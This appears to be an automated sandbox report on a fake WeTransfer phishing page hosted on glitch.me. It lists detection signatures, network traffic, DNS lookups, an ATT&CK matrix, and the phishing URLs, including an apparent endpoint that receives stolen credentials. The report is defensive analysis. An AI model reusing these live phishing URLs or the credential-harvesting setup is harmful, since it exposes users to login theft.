Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://certain-jeweled-verse.glitch.me/newson.htm

Overview

General Information

Sample URL:https://certain-jeweled-verse.glitch.me/newson.htm
Analysis ID:1521840
Tags:openphish
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish10
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Suricata IDS alerts with low severity for network traffic
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,6098861016623407671,11136246723157708082,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 7036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://certain-jeweled-verse.glitch.me/newson.htm" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_57JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-09-29T04:32:40.522524+020020325142Possible Social Engineering Attempted54.211.144.142443192.168.2.649716TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://certain-jeweled-verse.glitch.me/newson.htmSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering
      Source: certain-jeweled-verse.glitch.meVirustotal: Detection: 6%Perma Link
      Source: https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636Virustotal: Detection: 6%Perma Link
      Source: https://certain-jeweled-verse.glitch.me/newson.htmVirustotal: Detection: 13%Perma Link

      Phishing

      barindex
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_57, type: DROPPED
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: Number of links: 0
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: Title: We Transfer does not match URL
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: <input type="password" .../> found
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: No <meta name="author".. found
      Source: https://certain-jeweled-verse.glitch.me/newson.htmHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
      Source: Network trafficSuricata IDS: 2032514 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 54.211.144.142:443 -> 192.168.2.6:49716
      Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /newson.htm HTTP/1.1Host: certain-jeweled-verse.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=1600376573408 HTTP/1.1Host: cdn.glitch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636 HTTP/1.1Host: cdn.glitch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pdf.js HTTP/1.1Host: excel567.oss-ap-southeast-3.aliyuncs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico HTTP/1.1Host: cdn.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg HTTP/1.1Host: cdn.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://certain-jeweled-verse.glitch.mesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://certain-jeweled-verse.glitch.mesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://certain-jeweled-verse.glitch.mesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://certain-jeweled-verse.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico HTTP/1.1Host: cdn.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg HTTP/1.1Host: cdn.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: certain-jeweled-verse.glitch.me
      Source: global trafficDNS traffic detected: DNS query: excel567.oss-ap-southeast-3.aliyuncs.com
      Source: global trafficDNS traffic detected: DNS query: cdn.glitch.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.glitch.me
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AliyunOSSDate: Sun, 29 Sep 2024 02:32:42 GMTContent-Type: application/xmlContent-Length: 340Connection: closex-oss-request-id: 66F8BC4A9CAEC93030517167x-oss-server-time: 5x-oss-ec: 0003-00000801
      Source: chromecache_70.2.dr, chromecache_62.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: chromecache_57.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
      Source: chromecache_57.2.drString found in binary or memory: https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=1600376573408
      Source: chromecache_57.2.drString found in binary or memory: https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636
      Source: chromecache_57.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
      Source: chromecache_57.2.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
      Source: chromecache_57.2.drString found in binary or memory: https://drive.google.com/drive/u/0/my-drive
      Source: chromecache_57.2.drString found in binary or memory: https://eesfdhd.gq/new/Wetransfer-2020/post.php
      Source: chromecache_57.2.drString found in binary or memory: https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.js
      Source: chromecache_58.2.dr, chromecache_72.2.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_71.2.dr, chromecache_65.2.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_58.2.dr, chromecache_71.2.dr, chromecache_65.2.dr, chromecache_72.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_58.2.dr, chromecache_71.2.dr, chromecache_65.2.dr, chromecache_72.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_57.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
      Source: chromecache_57.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
      Source: classification engineClassification label: mal72.phis.win@16/25@28/14
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,6098861016623407671,11136246723157708082,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://certain-jeweled-verse.glitch.me/newson.htm"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,6098861016623407671,11136246723157708082,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
